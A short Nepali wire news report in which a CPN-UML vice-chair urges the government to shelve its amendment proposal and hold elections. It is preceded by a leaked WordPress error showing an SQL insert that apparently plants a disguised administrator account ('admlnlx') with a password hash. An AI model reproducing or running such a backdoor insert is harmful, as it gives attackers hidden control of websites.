WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B451OPjL/sECPc4u6oghJH5G.NBUI11', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 18:35:58', '', 'admlnlx', 'admlnlx')
दाङ,माघ १४–
। नेकपा ९एमाले०का उपाध्यक्ष युवराज ज्ञवालीले निर्वाचनको विकल्प नभएको बताउनुभएको छ ।
प्रेस चौतारी नेपाल दाङले आज तुलसीपुरमा आयोजना गरेको पत्रकार सम्मेलनमा उहाँले भन्नुभयो – “निर्वाचनको विकल्प नभएकाले सरकार यसतर्फ गम्भीर हुनुपर्दछ ।”
उपाध्यक्ष ज्ञवालीले “संविधान कार्यान्वयनका लागि राष्ट्रिय एकता कायम गर्ने समयमा सरकारले ल्याएको संशोधन प्रस्तावले सहमतिको वातावरण विथोलिएको छ” भन्दै “सरकारले सहमति कायम गरेर तत्कालका लागि संशोधन प्रस्तावलाई थाँती राखी निर्वाचनमा होमिनुपर्ने बताउनुभयो ।”
“नेपालमा एमाले कुनै किसिमको राष्ट्रघाती कदम चाल्न नदिइने पनि उहाँले बताउनुभयो ।- रासस